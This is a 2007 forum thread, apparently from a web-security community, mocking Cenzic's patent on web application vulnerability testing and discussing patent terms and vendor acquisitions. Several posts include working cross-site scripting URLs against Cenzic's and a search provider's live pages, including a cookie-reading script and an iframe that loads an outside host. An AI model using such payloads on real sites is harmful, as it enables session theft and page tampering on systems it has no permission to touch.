Cenzic 232 Patent
Cenzic Patent fun!
Posted by: zeno
Date: June 18, 2007 09:27PM

http://www.cgisecurity.com/2007/06/15


UGH

Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 19, 2007 05:24AM

So now we must pay royalties on each pentest we do? ^^ haha yeah right, could be fun.

Re: Cenzic Patent fun!
Posted by: Kyran
Date: June 19, 2007 07:40AM

Just what I need! More legal troubles. :(

- Kyran

Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 19, 2007 10:30AM

Patent this Cenzic: http://www.cenzic.com/forms/hailstorm.php?id=3&camp=\%22%3Exx<script>alert(document.cookie);</script><"


*sigh* great company! ^^

Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 19, 2007 10:34AM

@Ronald: Yep - the contact form is also full of XSS

<edit>and their search too:

http://www.picosearch.com/cgi-bin/ts.pl?index=229422&calln=5&lastq=&sortsel=%22%20onmouseover=%22alert('greetings!')%22%20b=%22&opt=ANY&doc0=20&query=xss
(mouseover the search pagination)
</edit>



Edited 2 time(s). Last edit at 06/19/2007 10:43AM by .mario.

Re: Cenzic Patent fun!
Posted by: mitmwatcher
Date: June 19, 2007 01:27PM

Guys take a look at this
http://intellectualweapons.com/

-Mitmwatcher

Re: Cenzic Patent fun!
Posted by: thrill
Date: June 19, 2007 03:49PM

Sounds a bit fishy to me. I think complete humiliation of the vendor that refused to work with me would be worth a lot more than the $20 I might end up getting from them. ;)

mitmwatcher Wrote:
-------------------------------------------------------
> Guys take a look at this
> http://intellectualweapons.com/
>
> -Mitmwatcher

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 19, 2007 04:06PM

Great business model: Sell vulns for a 90/10 share ^^

Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 20, 2007 05:26AM

if... there'll be a share

Re: Cenzic Patent fun!
Posted by: digi7al64
Date: June 25, 2007 12:01AM

If we use this product and it doesn't pick on a particular "fault" vector, are we entitled to sue for misrepresentation in that they (Cenzic) by their own admission stated that they retain the right to all fault tests and therefore under patent law should be able to ensure without failure they know every single aspect of their patent?

Also, and perhaps most interesting in this patent is from what I read in zeno's article is that possibly every website that uses querystrings/forms in their applications could by default be seen to be encroaching on the patent. However this is not the case and therefore it would appear that the patent relies on the scanner's purpose in relation to covering the patent.

Therefore I suggest rather than have a "scanning application tool" you simply rebrand your "scanning application tool" into a "website mapping analysis tool" which simply sends millions of malformed requests to the server in order to correctly identify and analyze the site layout.

btw:
@ronald - great work on the xss, I guess we can put Cenzic into our box of scanning companies that don't have a clue and can't protect their own site...oh wait what's that.. it's a honeypot 10 years in the making set up to trick ronald...

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 25, 2007 06:46AM

Yeah it only has symbolic value, I mean c'mon ^^, if you are a webappsec company, the least thing you can do is to patch all holes in your own site, check it again, re-check it until you are sure.

I get hit with tons of scanners a day, Acunetix ones, libwww-perl bots etc. None was able to find 1 XSS hole in any of my sites. I'm actually a bit insulted that they even tried. And yes I log every request, I know when someone enters a single quote only in any of my sites, nothing escapes my attention, and so a lot are blocked as a result, mostly the automated ones. So I know people try and most of the time they try when I publish something like this, ah the joy of seeing the struggle. :)

Re: Cenzic Patent fun!
Posted by: rsnake
Date: June 26, 2007 07:57PM

Companies often patent things right before they try to get bought. It makes them have a stronger position, and makes their competitors a harder acquisition target. If any of you were around when Sanctum was about to get bought you will remember the idiocy of patenting going on there as well.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Cenzic Patent fun!
Posted by: fyoung
Date: June 26, 2007 09:08PM

rsnake Wrote:
-------------------------------------------------------
> Companies often patent things right before they
> try to get bought. It makes them have a stronger
> position, and makes their competitors a harder
> acquisition target. If any of you were around
> when Sanctum was about to get bought you will
> remember the idiocy of patenting going on there as
> well.


Watchfire was just purchased by IBM a few weeks back, though they didn't try to patent the wheel.

Re: Cenzic Patent fun!
Date: June 27, 2007 12:35AM

Did they apply for a patent, or receive one from a previous submittal? Patents are only good for 7 years anyway.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Cenzic Patent fun!
Posted by: dev80
Date: June 27, 2007 09:54AM

@fyoung: Oh?

Sanctum acquired by Watchfire acquired by IBM

System for determining web application vulnerabilities
http://www.patentstorm.us/patents/6584569-fulltext.html

and for a breakdown:

Web Application Penetration Testing Methodology Patent
http://seclists.org/webappsec/2004/q1/0023.html



@Awesome AnDrEw:
"In Canada, a patent lasts 20 years from the date of application, for applications filed since 1 October 1989. In the United States, the term is also 20 years from the date of the first filed U.S. application; however, for applications filed since 29 May 2000, the term may be extended based on any delays in issuance of the patent caused by the U.S. Patent and Trademark Office."
http://www.parteqinnovations.com/randi-faq.html

Re: Cenzic Patent fun!
Posted by: fyoung
Date: June 27, 2007 10:44AM

dev80 Wrote:
-------------------------------------------------------
> @fyoung: Oh?
>
> Sanctum acquired by Watchfire acquired by IBM

I stand corrected.

Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 28, 2007 12:24AM

I have another patent for them: http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C

Maybe you should patent them XSS sheet Robert. ^^

Re: Cenzic Patent fun!
Date: June 28, 2007 01:06AM

When I took Accounting in college I could have sworn we learned that patents were only valid for 7 years. Oh well. I do most of my work by "hand" anyway so screw them.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/
